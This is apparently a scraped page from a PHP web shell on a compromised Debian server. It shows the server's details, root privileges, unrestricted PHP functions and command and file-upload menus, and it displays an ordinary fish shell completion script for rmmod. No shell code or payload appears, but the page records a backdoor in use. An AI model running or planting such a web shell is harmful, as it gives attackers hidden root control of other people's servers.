|
Server IP : 161.35.85.9 / Your IP : 216.73.217.134 Web Server : nginx/1.30.1 System : Linux cheapdeb-ams3 7.0.9+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 7.0.9-1 (2026-05-22) x86_64 User : root ( 0) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/fish/vendor_functions.d/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# rmmod(8) completion -*- shell-script -*- # SPDX-License-Identifier: LGPL-2.1-or-later # # SPDX-FileCopyrightText: 2024 Emil Velikov <emil.l.velikov@gmail.com> # globally disable file completions complete -c rmmod -f complete -c rmmod -s f -l force -d "DANGEROUS: forces a module unload and may crash your machine" complete -c rmmod -s s -l syslog -d 'print to syslog, not stderr' complete -c rmmod -s v -l verbose -d 'enables more messages' complete -c rmmod -s V -l version -d 'show version' complete -c rmmod -s h -l help -d 'show this help' # provide an exclusive (x) list of required (r) answers (a) complete -c rmmod -x -ra "(lsmod | cut -f1 -d' ')"